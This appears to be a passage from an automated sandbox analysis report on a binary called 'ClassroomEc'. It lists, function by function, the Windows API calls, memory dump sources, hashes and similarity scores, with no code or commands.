                                                                                                                                                              • Instruction ID: 9f6a3a341efc1ae01983fbf0438531a45d3f65a96e3c703735548138d9597699
                                                                                                                                                              • Opcode Fuzzy Hash: 3684dc4e926ab8e4cbd896d8bc576817aed1d033ebfa4064b7a2e5284f5a3e7c
                                                                                                                                                              • Instruction Fuzzy Hash: 23F01CB9904248BFCB00DFD8D885FDEBBB8AB59300F008199F948D7341E631A615CBA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00D78FF0: ??2@YAPAXI@Z.MSVCRT ref: 00D79019
                                                                                                                                                              • _wmemmove.LIBCMTD ref: 00D792A5
                                                                                                                                                                • Part of subcall function 00D71470: memcpy.MSVCRT ref: 00D71481
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@_wmemmovememcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2841112568-0
                                                                                                                                                              • Opcode ID: d18e22370add9a75cc1ae37fbc34cd2e07dc1684bfef52e163650ba2ed4e33ee
                                                                                                                                                              • Instruction ID: 5e5c37beade8e2bfe1fb74e76dcf4cec8d44b0e3c9d1ab78343a789c5316196f
                                                                                                                                                              • Opcode Fuzzy Hash: d18e22370add9a75cc1ae37fbc34cd2e07dc1684bfef52e163650ba2ed4e33ee
                                                                                                                                                              • Instruction Fuzzy Hash: C5F0C0B9D00108BBCB04DFD8D885C9EBBB9EF89304F1081A8F90897305E631AB50DBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • SysAllocStringLen.OLEAUT32(00000000,00D71522), ref: 00D79F29
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocString
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2525500382-0
                                                                                                                                                              • Opcode ID: d7cbbde77740999411b81eb87880909acaa65826c7cedefc28f7bd477c7029d3
                                                                                                                                                              • Instruction ID: 5ef2f6e1e412579d9546c0aacd302dff58bacc86d0f96856f18349ad29ebd015
                                                                                                                                                              • Opcode Fuzzy Hash: d7cbbde77740999411b81eb87880909acaa65826c7cedefc28f7bd477c7029d3
                                                                                                                                                              • Instruction Fuzzy Hash: 91F0F2342143099BDB00CF14C490B65BB65EF49324F20C159E84CCF350D676E981CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,?,00D76A77,00000000,00000000,?,?,?,00D633A6,?,?), ref: 00D76A49
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileTime
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1425588814-0
                                                                                                                                                              • Opcode ID: 7d26cc3353ed8967065c2cf31f64dc9e5935d2787a74df7f6e8a88108e4aec46
                                                                                                                                                              • Instruction ID: 2fea12aaec6f474c68cee4be7b4a979a365028177287b2fbaf116fb2844637d1
                                                                                                                                                              • Opcode Fuzzy Hash: 7d26cc3353ed8967065c2cf31f64dc9e5935d2787a74df7f6e8a88108e4aec46
                                                                                                                                                              • Instruction Fuzzy Hash: D8E0ECB6918208BB8B04DF98EC55C9BB7ACEB5D300B00815DF909C7300E632EA10CBB5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • std::ios_base::clear.LIBCPMTD ref: 00D61381
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::ios_base::clear
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1443086396-0
                                                                                                                                                              • Opcode ID: b3493e062fb2f0b29b7aba0934e9481bbdd5119705f384922eea4d1d880fe996
                                                                                                                                                              • Instruction ID: e0c1ecab65dcead302a0d46f38669036fa4d9f7bacd0789e36208a52737b756d
                                                                                                                                                              • Opcode Fuzzy Hash: b3493e062fb2f0b29b7aba0934e9481bbdd5119705f384922eea4d1d880fe996
                                                                                                                                                              • Instruction Fuzzy Hash: B6C0127190410CBB4704DF8CD80195EB7ACDB18300B004169B90997301D5319A1097B9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 829399097-0
                                                                                                                                                              • Opcode ID: 1b33bacb710f9eb2fec02fe0876406eed64e1db90da857b4bf7f1ee716fc9ac7
                                                                                                                                                              • Instruction ID: 4d126abe837694e9fbd6109ad75b64922f425c2b8732c7f06b4122a02087d044
                                                                                                                                                              • Opcode Fuzzy Hash: 1b33bacb710f9eb2fec02fe0876406eed64e1db90da857b4bf7f1ee716fc9ac7
                                                                                                                                                              • Instruction Fuzzy Hash: FB015EB0E04208ABDB04EFA4DC5676E77B4EF04340F044068E856EB392EB319B48CBB5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1033339047-0
                                                                                                                                                              • Opcode ID: 1dd495598ebddd9998bd3669da28e97c01af639729b23818e2c0219baa4f5057
                                                                                                                                                              • Instruction ID: 44b9bc25ad1b284f0e9ceea0b31edb52be733bbaa3ba3d4e71acd4535745b979
                                                                                                                                                              • Opcode Fuzzy Hash: 1dd495598ebddd9998bd3669da28e97c01af639729b23818e2c0219baa4f5057
                                                                                                                                                              • Instruction Fuzzy Hash: 52F0FEB5A05208AFCB08DF58D442A5DFFF4EF48350F1081A9EC499B345D631EE51CB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1033339047-0
                                                                                                                                                              • Opcode ID: 917d4162340fb44f94f007ac9e731a54d4517bc9d05544b15a4b49cae7dede00
                                                                                                                                                              • Instruction ID: 96aba09519616c8d35e5fed7b7ea39d81cc67da809cb78cec60bfb9f71e2edaf
                                                                                                                                                              • Opcode Fuzzy Hash: 917d4162340fb44f94f007ac9e731a54d4517bc9d05544b15a4b49cae7dede00
                                                                                                                                                              • Instruction Fuzzy Hash: 71E09AB5D04208EFCB55DF98D445A9DBBB4EB59310F1081A5E848A7340E731AA94CBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004), ref: 00D747FA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                              • Opcode ID: b71d62c39fa2de8ff5d928f8410dea69b59b49ba1925f3eb220be2a412bf90ef
                                                                                                                                                              • Instruction ID: b54c849faa94165375a248ab44e24fa3ac80519772aae268a0344ec826f9c48d
                                                                                                                                                              • Opcode Fuzzy Hash: b71d62c39fa2de8ff5d928f8410dea69b59b49ba1925f3eb220be2a412bf90ef
                                                                                                                                                              • Instruction Fuzzy Hash: ADD0123025430DFAE7014A50EC85BB637989704795F548010FB5D9D1D0E3B0959046B5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00D74826
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                              • Opcode ID: c0f332d108aaf7ce570e89df32d3c6ebc072e61ac3e146c55efc1c2b8522e3e5
                                                                                                                                                              • Instruction ID: 451a2529526438ae8b420cbed104815126ad51f55aae88a7c896a0d692f2608c
                                                                                                                                                              • Opcode Fuzzy Hash: c0f332d108aaf7ce570e89df32d3c6ebc072e61ac3e146c55efc1c2b8522e3e5
                                                                                                                                                              • Instruction Fuzzy Hash: 1CC0123054070CAADA105A90E849BF63B98A704722F10C011BA8D9A280E7B0A6848BA2
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • wvsprintfW.USER32(?,?,?), ref: 00D6B32D
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00D6B33D
                                                                                                                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,?,?,00000000,00000000), ref: 00D6B36C
                                                                                                                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00000000,?,?,00000000,00000000), ref: 00D6B393
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000,00000000), ref: 00D6B3A8
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000,00000000), ref: 00D6B3BB
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00D6B3DC
                                                                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 00D6B404
                                                                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 00D6B437
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00D6B45F
                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 00D6B46E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 829399097-0
                                                                                                                                                              • Opcode ID: 8904fd2fd2b11f3e444f1c206eacaee4a8db718e324b3208f76427c6edc71c85
                                                                                                                                                              • Instruction ID: 67d0bf5eed78fdcfe99a78acf050d40997a56c2211a18cd9fcaf483899e791e9
                                                                                                                                                              • Opcode Fuzzy Hash: 8904fd2fd2b11f3e444f1c206eacaee4a8db718e324b3208f76427c6edc71c85
                                                                                                                                                              • Instruction Fuzzy Hash: 13411DB59002189BDB64DF54DC55BEAB3B8FF48300F04C1A9E58AD6240EF30AA85CFE1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • memcpy.MSVCRT ref: 00D69FE0
                                                                                                                                                              • SystemParametersInfoW.USER32(00000029,00000000,000001F4,00000000), ref: 00D69FFF
                                                                                                                                                              • GetDC.USER32(00000000), ref: 00D6A00B
                                                                                                                                                              • GetDeviceCaps.GDI32(?,0000005A), ref: 00D6A020
                                                                                                                                                              • MulDiv.KERNEL32(?,00000048,00000000), ref: 00D6A030
                                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 00D6A047
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00D6A077
                                                                                                                                                              • FindResourceA.KERNEL32(?,00000000,00000005), ref: 00D6A0AD
                                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00D6A0D0
                                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 00D6A0EC
                                                                                                                                                              • DialogBoxIndirectParamW.USER32(?,00000000,?,Function_00008D70,?), ref: 00D6A138
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Resource$CapsDeviceDialogFindHandleIndirectInfoLoadLockModuleParamParametersReleaseSystemmemcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3119308957-0
                                                                                                                                                              • Opcode ID: 5fa68fc49fb9847ce5b33e5800804728f246c1e35db0766033dcce9bec3fe865
                                                                                                                                                              • Instruction ID: 106b6283802f910796432458e9faca5c05322800e356df47eb78fb443086c098
                                                                                                                                                              • Opcode Fuzzy Hash: 5fa68fc49fb9847ce5b33e5800804728f246c1e35db0766033dcce9bec3fe865
                                                                                                                                                              • Instruction Fuzzy Hash: 7F4107B4914328AFDB26DF64CC49BEAB7B8BB08701F0881D8E55DA6290D7715F84CF61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • _wtol.MSVCRT(?), ref: 00D65223
                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000019,00000000), ref: 00D65352
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D6536D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocatorDebugFolderHeapPathSpecial_wtol
                                                                                                                                                              • String ID: .lnk
                                                                                                                                                              • API String ID: 3713458237-24824748
                                                                                                                                                              • Opcode ID: 2f6c2f49dce12b4c61b342b859143dbb6aef49231e40acdaed3a60255455a2b7
                                                                                                                                                              • Instruction ID: 3a7fdea861d4c49bf8169cb5dec375b2e24c95c80c92611aec8bcf05d03ce6d6
                                                                                                                                                              • Opcode Fuzzy Hash: 2f6c2f49dce12b4c61b342b859143dbb6aef49231e40acdaed3a60255455a2b7
                                                                                                                                                              • Instruction Fuzzy Hash: F30259749111199BDB14EF61EC9AAEDB774EF14304F548198E40AA72A5EF30AEC8CF70
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryA.KERNEL32(uxtheme,?,?,000004B2,?), ref: 00D69F3E
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00D69F56
                                                                                                                                                              • GetWindow.USER32(00000000,00000005), ref: 00D69F70
                                                                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00D69F96
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$AddressLibraryLoadProc
                                                                                                                                                              • String ID: SetWindowTheme$uxtheme
                                                                                                                                                              • API String ID: 324724604-1369271589
                                                                                                                                                              • Opcode ID: fe1889f94c093361a91c8c8b6eb5d623e69e8db1acbea35af4203ea78a98cd36
                                                                                                                                                              • Instruction ID: 513aa436011ea2e437365ed41f02af86f71aeea9fb56c955dd788a972f77d90b
                                                                                                                                                              • Opcode Fuzzy Hash: fe1889f94c093361a91c8c8b6eb5d623e69e8db1acbea35af4203ea78a98cd36
                                                                                                                                                              • Instruction Fuzzy Hash: 9D011674D10308EFEB00AFA4CC5DBADFBB8EB44701F048499E416A6290D7B54A44DF60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00D68CEF
                                                                                                                                                              • SetWindowsHookExW.USER32(00000007,Function_00008A80,00000000,00000000), ref: 00D68CFF
                                                                                                                                                                • Part of subcall function 00D68990: _DebugHeapAllocator.LIBCPMTD ref: 00D689AF
                                                                                                                                                                • Part of subcall function 00D68990: wsprintfW.USER32 ref: 00D689E1
                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00D68D13
                                                                                                                                                              • SetWindowsHookExW.USER32(00000002,Function_00008B60,00000000,00000000), ref: 00D68D23
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CurrentHookThreadWindows$AllocatorDebugHeapwsprintf
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3455760282-0
                                                                                                                                                              • Opcode ID: 6ab79ee9ca7dbb7dd03ee11e5907120580ba02546cf0df9848f217c8054aa314
                                                                                                                                                              • Instruction ID: 00ff62f87f68da642be305487b1da982af4d4ff0058ab294e1039418c5dc6481
                                                                                                                                                              • Opcode Fuzzy Hash: 6ab79ee9ca7dbb7dd03ee11e5907120580ba02546cf0df9848f217c8054aa314
                                                                                                                                                              • Instruction Fuzzy Hash: 77115774A60308EFDB04DFA4EC59B28B7B5EB45708F14429AE905963E1DB716E40EF34
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00027C92), ref: 00D87CDA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                              • Opcode ID: 387d96530fc800ba1f9854ec2db128edae8de08f59d92e3a6ff00e5a69b81ec0
                                                                                                                                                              • Instruction ID: d0bacb1f0739d4c3bbc3b2802a3196853429b335054036cd81eda653ce627b4e
                                                                                                                                                              • Opcode Fuzzy Hash: 387d96530fc800ba1f9854ec2db128edae8de08f59d92e3a6ff00e5a69b81ec0
                                                                                                                                                              • Instruction Fuzzy Hash: C99002742697014A8A5027709C1D92AE5A46B49B02F5584546481C5158DB6480446731
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
